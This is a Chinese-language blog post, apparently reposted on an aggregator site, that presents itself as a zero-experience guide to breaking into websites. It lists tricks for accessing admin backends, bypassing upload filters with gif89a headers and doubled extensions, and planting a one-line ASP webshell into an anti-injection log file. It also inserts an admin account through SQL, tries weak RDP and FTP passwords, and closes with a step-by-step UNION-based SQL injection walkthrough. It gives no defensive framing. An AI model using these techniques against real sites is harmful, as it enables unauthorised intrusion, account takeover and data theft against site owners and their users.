有手就行:零基础渗透网站步骤

news/2024/5/21 10:12:47/文章来源:https://blog.csdn.net/jklbnm12/article/details/118443222

前言:渗透技巧小总结,希望大家喜欢!

渗透技巧

1.拿到一个网站后,先进行扫描,对网站全局进行爬行。

2.某些cms的网站设置过滤不严,直接在网站后面加上admin/session.asp 或 admin/left.asp 可直接进入后台

3.入侵网站之前连接下3389,可以连接上的话先尝试弱口令,不行就按5次shift键,看看有没有shift后门

4.访问后台地址时弹出提示框“请登陆” 把地址记出来(复制不了)放到“网页源代码分析器”里,选择浏览器-拦截跳转勾选–查看即可直接进入后台。

5.:javascript:document.write("<ahref=‘http://www.xxx.com/uploadfile/1.asp’>fuck") 点击GO即可进入shell。

6.遇到一流信息监控拦截系统时,上传图片木马或是在木马代码最前面加上gif89a即可逃过检测。

7.eweb编辑器后台,增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了,尝试增加一个aaspsp,再上传asp就会解析了。

8.用注入工具猜解到表段却猜解不到字段的时候,到网站后台右键查看源文件,一般账号密码后面的就是字段,之后在注入工具里添加字段进行猜解即可。

9.当注入工具猜解表段,但猜解字段时提示长度超过50之类,不妨扔到穿山甲去猜解一下。

10.得知表段跟字段之后,使用SQL语句在ACCESS数据库里加个用户名及密码的语句:Insert into admin(user,pwd) values(‘jianmei’,‘daxia’)

11.当获得管理员密码却不知道管理员帐号时,到网站前台找新闻链接,一般“提交者”“发布者”的名字就是管理员的帐号了。

12.爆破ASP+IIS架设的网站web绝对路径,假设网站主页为:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

13.有的站长很懒什么也不改,当我们得知网站的cms的时候,不妨去下载一套找找数据库路径,以及敏感信息,再尝试默认相关的可利用资源。

14.菜刀里点击一句话木马右键,选择虚拟机终端,执行命令出现乱码时,返回去设置编码那里,将默认的GB2312改为UTF-8.

15.入侵千万别忘了ftp,试试诺口令,ftp的默认端口:21 默认帐号密码:test

16.破解出md5为20位结果,只需要把前三位和后一位去掉,剩余16位拿去解密即可

17.好多网站的后台地址是:admin_index.asp manage_login.asp

18.有时在木马代码里加上了gif89a,上传成功访问的时候却出现了像图片一样的错误图像,说明服务器把gif89a当做图片来处理了,不要带gif89a即可。问就可以了。

19.找eweb编辑器的时候,如果默认的被改了,到前台去找图片右键看下路径,根据图片的目录猜eweb编辑器的目录,后台也是用此思路。

20.IIS注册表全版本泄漏用户路径和FTP用户名漏洞:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\VirtualRoots\

21.扫旁站的时候,是不是想看每个站点是什么cms呢?用轩辕剑扫描就可以显示系统特征。

22.网站的主站一般都很安全,这时就要旁注或C段了,但是想知道各个IP段开放了什么端口吗?用“啊D网络工具包”里面的IP端口扫描最理想了。

23.手工检测注入点弹出“你的操作已被记录!”之类的信息,访问这个文件:sqlin.asp,如果存在,在注入点后面植入一句话木马:‘excute(request(“TNT”))
接着用一句话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。

24.有的后台不显示验证码,往注册表里添加一个ceg即可突破这个困境了,把下面的代码保存为Code.reg,双击导入就可以了。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
“BlockXBM”=dword:00000000

25.内网渗透时尽量少登录3389,以免被管理员发现。

手工注入:

手工注入的时候如果过滤掉了and 1=1 and 1=2 可用 or1=1 or 1=2来判断

第一步:找注入点

数字型注入:
And 1=1
And1=2

第二部:猜字段数

语句:order by x x(代表某某)
猜大了就往小写,小了就给大些,直到返回正确为止

第三步:union命令

And1=2 union select1,2,3,4,5 …

第四步:猜库名

And 1=2 union select 1,SCHEMA_NAME,3,4,5 frominformation_schema.SCHEMATA limit 1,1

第五步:猜内容

And 1=2 union select 1,2,3,4,5,6,7,8,9,0 from admin

感谢每一个认真阅读我文章的人,礼尚往来总是要有的,虽然不是什么很值钱的东西,如果你用得到的话可以直接拿走:

① 2000多本网络安全系列电子书(主流和经典的书籍应该都有了)

② 网络安全标准题库资料(最全中文版)

③ 项目源码(四五十个有趣且经典的练手项目及源码)

④ 网络安全基础入门、Linux、web安全、渗透、攻防方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

【点击获取】
————————————————

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_721750.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

长腿翘臀老狗问我网站测试有哪些要点,我这样答

前言 老狗腿长手也长&#xff0c;没事就来刁难我&#xff0c;幸好我专业知识过硬&#xff0c;不然早得搬家了。 无图无真相 上图 长腿狗子看够了&#xff0c;下面进入正题&#xff0c;赠送全套网安学习资料和老狗私房照可在文末获取 网站或网页的效率在很大程度上取决于测…

优雅地寻找网站源码(一)

优雅地寻找网站源码(一) 0x0 前言 渗透过程中如果能获取到网站的源代码&#xff0c;那么无疑开启了上帝视角。虽然之前出现过不少通过搜索引擎查找同类网站&#xff0c;然后批量扫备份的思路&#xff0c;但是却没人分享其具体过程&#xff0c;这里笔者便整理了自己开发分布式…

网站前端联系我们之点击自动打开qq/Tim对话窗口

自动跳出QQ/TIM对话框 没有完美的网站&#xff0c;需要用户的反馈来完善我们的页面。那么&#xff0c;联系我们必不可少。在即时通讯软件中,QQ/Tim用的最多。前几天发现了自动调用QQ/Tim代码&#xff0c;经测试发现可以用&#xff0c;很方便&#xff0c;分享给大家。 Contact.…

JSP-购物类网站(购物车功能,翻页功能,文件下载功能,文末有代码及数据库备份)

目录 网站功能框架 网站架构图 网站项目树 网站首页 注册登录页面 用户个人中心页面 商家个人中心页面 搜索结果页面 商品详细信息页面 手机端页面(部署后) 之前在校内参加过网站设计大赛&#xff0c;贡献全部代码&#xff0c;供jsp小白学习。 这是一个购物类网站,后…

网站安全检测:推荐8款免费的 Web 安全测试工具

随着 Web 应用越来越广泛&#xff0c;Web 安全威胁日益凸显。黑客利用网站操作系统的漏洞和 Web 服务程序的 SQL 注入漏洞等得到Web服务器的控制权限&#xff0c;轻则篡改网页内容&#xff0c;重则窃取重要内部数据&#xff0c;更为严重的则是在网页中植入恶意代码&#xff0c;…

利用wvs扫描网站发现一个页面,暴露了错误信息

今晚给一个网站做了一次入侵检测&#xff0c;首先进行信息刺探后&#xff0c;发现这个站有注入策略&#xff0c;所有页面都没法通过常规的注入&#xff0c;利用wvs扫描网站发现一个页面。 这个页面直接暴露出了错误信息&#xff0c;看了一下url没有参数却爆出了错误&#xff0c…

网站攻击到提权的全部过程

准备工作 靶机&#xff08;被攻击方&#xff09;&#xff1a;win7系统 入侵者&#xff08;攻击方&#xff09;&#xff1a;win10系统、kali系统 首先启动win7系统&#xff0c;搭建一个常见的校园网站&#xff0c;然后映射到局域网&#xff0c;使得我们能正常访问。 从网站拿到…

网站控制工具:冰蝎3.0使用体验

这篇文章比较基础&#xff0c;主要面向新手&#xff0c;技术含量较低主要为操作流程。 0x01. 冰蝎是什么 利用动态二进制加密实现新型一句话木马的客户端 , 相对于菜刀和蚁剑他的数据是加密传输的 1.1 下载 github地址: https://github.com/rebeyond/Behinder/releases 下载后…

【网络安全】记一次网站站点渗透

前言 遇到一个站&#xff0c;后端是Node.js写的&#xff0c;对于这种类型的站点&#xff0c;一般比较难getshell&#xff0c;但也实现了最终的目标&#xff0c;拿到后台权限 信息搜集 先进行常规的信息搜集&#xff0c;子域名扫描、端口扫描、目录扫描等 这个站后端脚本语…

web安全渗透之钓鱼网站提权

本实验实现1&#xff1a;要生成一个钓鱼网址链接&#xff0c;诱导用户点击&#xff0c;实验过程是让win7去点击这个钓鱼网站链接&#xff0c;则会自动打开一个文件共享服务器的文件夹&#xff0c;在这个文件夹里面会有两个文件&#xff0c;当用户分别点击执行后&#xff0c;则会…

某cms网站渗透的过程

1.通过fofa查询出该网站的后台&#xff0c;进去发现很像某cms&#xff0c;利用御剑的cms识别工具识别出对方是phpcms的站。 2.通过百度查询得出&#xff1a;该phpcms站点可能存在文件上传&#xff0c;敏感信息泄露&#xff0c;sql报错注入。我只验证出来了sql报错注入。 3.把这…

网站渗透这块水太深,你把握不住!但你叔我能(十年经验分享)

很多朋友问我&#xff0c;想搞网络安全&#xff0c;编程重要吗&#xff0c;选什么语言呢&#xff1f; 国内其实正经开设网络安全专业的学校很少&#xff0c;大部分同学是来自计算机科学、网络工程、软件工程专业的&#xff0c;甚至很多非计算机专业自学的。因此不像这三个专业…

一个HTTP请求,把网站打裂开了!

大家好&#xff0c;我是周杰伦&#xff0c;今天给大家看一段神奇的代码。 利用这几行神奇的代码&#xff0c;居然能把网站打崩溃&#xff0c;这是怎么一回事呢&#xff1f; 就是下面这个函数&#xff0c;根据传进来的开始和结束位置&#xff0c;读取文件数据&#xff1a; ch…

学完渗透赌博网站,从零基础到实战的Web渗透学习路线+手册

前言 大家好 我是周杰伦&#xff01; 大家都知道IT是一个非常复杂和混沌的领域&#xff0c;充斥着各种已经半死不活的过时技术和数量更多的新系统、新软件和新协议。保护现在的企业网络不能仅仅依靠补丁管理、防火墙和用户培训&#xff0c;而更需要周期性地对网络中的安全防御…

成功端掉了一个色情网站,教科书级的社工教学。

0x00 事件起因 在知乎上&#xff0c;有一位叫凌云的大神讲述了自己端掉色情网站还把建站者揪出来教育了一顿&#xff0c;剧情实在精彩&#xff0c;主题非常正能量&#xff0c;强烈推荐给大家阅读。 以下是正文内容。 “我顺着一个色情网站域名顺藤摸瓜查到了背后操控者的真实…

ajax网站拖拽效果

转自&#xff1a;http://hi.baidu.com/yan5201314/blog/item/b69e543d01550bee3c6d9743.html 2006年11月18日 星期六 上午 00:23近日在SyosyumesBlog上的看到GOOGLE的个性化主页拖搁功能的实现方法可以借鉴&#xff0c;他的方法是用Jscript实现&#xff0c;不包含记忆功能&…

程序员必备的16个实用的网站

3个月以前在知乎上回答一个问题【有哪些能集实用&#xff0c;装逼于一身的冷门网站&#xff1f;】得到很多小伙伴的喜爱&#xff0c;一直到现在都还陆陆续续收到大家的赞&#xff0c;谢谢大家。 于是&#xff0c;我就想&#xff0c;现在有了专栏&#xff0c;干脆把这个回答写成…

大型网站技术架构总结一二

早期的网站为了节省成本一般会设计成集中式系统&#xff0c;应用程序、数据库等都部署在一台服务器上。 但随着业务的快速度发展&#xff0c;逐渐出现瓶颈&#xff0c;按一定原则**&#xff08;应用拆分、服务拆分、数据拆分、应用解耦&#xff09;**&#xff0c;向分布式系统转…

小白入门:大型网站技术架构负载均衡技术介绍及学习资源推荐

十年间&#xff0c;负载均衡的前沿技术层出不穷&#xff0c;令用户眼花缭乱。经常在技术网站、文档中出现的“四层负载均衡”、“七层负载均衡”字眼有什么含义?有什么区别?对客户网络有哪些不同的优化? 在大型的网站服务器集群中&#xff0c;负载均衡技术是必不可少的。使用…

大型网站架构之架构演变

公众号 | Justin谈开发作者 | Justin处于这个互联网开发时代&#xff0c;作为一名软件工程师&#xff0c;我们经常会听到大型网站架构这个字眼&#xff0c;那到底什么是大型网站呢&#xff0c;这样的网站又是一种什么样的架构设计呢&#xff1f;今天我们就开始谈谈大型网站架构…